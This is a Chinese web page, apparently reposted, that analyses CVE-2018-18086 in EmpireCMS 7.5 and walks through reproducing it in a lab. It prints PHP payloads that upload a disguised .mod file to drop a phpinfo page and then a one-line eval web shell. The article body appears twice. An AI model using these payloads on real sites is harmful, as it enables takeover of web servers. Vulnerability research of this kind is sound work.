帝国CMS(EmpireCMS) v7.5后台getshell分析(CVE-2018-18086)
时间:2023年06月11日
/来源:网络
/编辑:佚名
一、漏洞描述
EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。EmpireCMS7.5版本中的/e/class/moddofun.php文件的”LoadInMod”函数存在安全漏洞,攻击者可利用该漏洞上传任意文件。
二、影响版本
EmpireCMS<=7.5
三、环境搭建
1、官方下载EmpireCMS V7.5 下载地址:http://www.phome.net/download/
2、把下载的文件中的upload下的所有目录和文件放入到网站根目录下
3、修改php.ini配置文件, PHP环境中必须开启短标签,不然安装会提示无法安装
4、设置php.ini中 short_open_tag = On,重启phpstudy
5、然后开始安装,安装过程参考: https://jingyan.baidu.com/article/48b37f8dcc014b1a6564887c.html
四、漏洞复现
1、查看/e/admin/ecmsmod.php代码
2、跟随LoadInMod函数来到/e/class/moddofun.php,可以看到上传文件处使用make_password(10)对时间进行加密然后拼接成为上传的文件名,这样就无法得到用户名
3、继续浏览代码,在下面发现@include($path),直接包含了这个上传的文件,这时如果在上传文件中添加可以创建文件的代码就可以绕过找不到文件名这个限制了。
4、我们可以构造如下payload:
<?php file_put_contents(“shell.php”,”<?php phpinfo(); ?>”); ?>
5、登录后台,点击如下图所示
6、点击”导入系统模型”之后进入如下界面
7、可以上传一个内容为php代码的”.mod”后缀的文件,内容如下:
8、上传1.php.mod文件
9、查看文件,可以看到成功上传
10、浏览访问http://192.168.10.171/empirecms/e/admin/shell.php,可以看到成功执行代码
11、上传一个内容可以getshell的1.php.mod,内容入下:注意需要对$进行转义
<?php file_put_contents("caidao.php","<?php @eval(\$_POST[cmd]); ?>");?>
12、成功上传后,菜刀连接,成功getshell
https://github.com/l1nk3rlin/php_code_audit_project/issues/1
EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。EmpireCMS7.5版本中的/e/class/moddofun.php文件的”LoadInMod”函数存在安全漏洞,攻击者可利用该漏洞上传任意文件。
二、影响版本
EmpireCMS<=7.5
三、环境搭建
1、官方下载EmpireCMS V7.5 下载地址:http://www.phome.net/download/
2、把下载的文件中的upload下的所有目录和文件放入到网站根目录下
3、修改php.ini配置文件, PHP环境中必须开启短标签,不然安装会提示无法安装
4、设置php.ini中 short_open_tag = On,重启phpstudy
5、然后开始安装,安装过程参考: https://jingyan.baidu.com/article/48b37f8dcc014b1a6564887c.html
四、漏洞复现
1、查看/e/admin/ecmsmod.php代码
2、跟随LoadInMod函数来到/e/class/moddofun.php,可以看到上传文件处使用make_password(10)对时间进行加密然后拼接成为上传的文件名,这样就无法得到用户名
3、继续浏览代码,在下面发现@include($path),直接包含了这个上传的文件,这时如果在上传文件中添加可以创建文件的代码就可以绕过找不到文件名这个限制了。
4、我们可以构造如下payload:
<?php file_put_contents(“shell.php”,”<?php phpinfo(); ?>”); ?>
5、登录后台,点击如下图所示
6、点击”导入系统模型”之后进入如下界面
7、可以上传一个内容为php代码的”.mod”后缀的文件,内容如下:
8、上传1.php.mod文件
9、查看文件,可以看到成功上传
10、浏览访问http://192.168.10.171/empirecms/e/admin/shell.php,可以看到成功执行代码
11、上传一个内容可以getshell的1.php.mod,内容入下:注意需要对$进行转义
<?php file_put_contents("caidao.php","<?php @eval(\$_POST[cmd]); ?>");?>
12、成功上传后,菜刀连接,成功getshell
https://github.com/l1nk3rlin/php_code_audit_project/issues/1
新闻资讯 更多
- 【帝国cms教程】帝国CMS模板变量$GLOBALS[navclassid]用法分析04-03
- 【帝国cms教程】鲜为人知帝国CMS内容页调用上一篇和下一篇的精华方法汇总04-03
- 【帝国cms教程】怎么快速找出帝国CMS数据库配置文件路径及迁移网站后修改技巧!04-03
- 【帝国cms教程】帝国CMS模板$GLOBALS[navclassid]用法详解04-03
- 【帝国cms教程】帝国cms 7.5版列表页分页样式修改笔记04-02
- 【帝国cms教程】解决帝国CMS搜索页面模板不支持灵动标签和万能标签的方法04-02
- 【帝国cms教程】帝国CMS只备份栏目和模板的方法04-02
- 【帝国cms教程】帝国CMS怎样删除清空数据库记录?04-02
猜你需要
热门文章
- 178Moban源码谈谈免费源码与收费源码的区别
- 2帝国CMS忘记后台登陆用户名、密码、认证码的解决方法
- 3帝国CMS(EmpireCMS) v7.5后台任意代码执行漏洞及具体修复方法
- 4帝国CMS和WordPress 哪个好?哪个适合建站?
- 5如何解决Discuz的密码错误次数过多请15分钟后登陆的问题
- 6帝国cms灵动标签取得内容和栏目链接地址
- 7emlog pro 注册码“开心”教程(如果有一天,emlog官方版 或者 emlog免费版 跑路了,那用户怎么办?)
- 8织梦CMS在nginx下设置伪静态方法(附nginx伪静态规则)
- 9帝国cms后台登录出现”您还未登录”怎么解决?
- 10帝国cms7.5忘记登录密码 和忘记登录认证码以及多次登录 失败被锁定解决办法
豫ICP备2021026617号-1
豫公网安备:41172602000185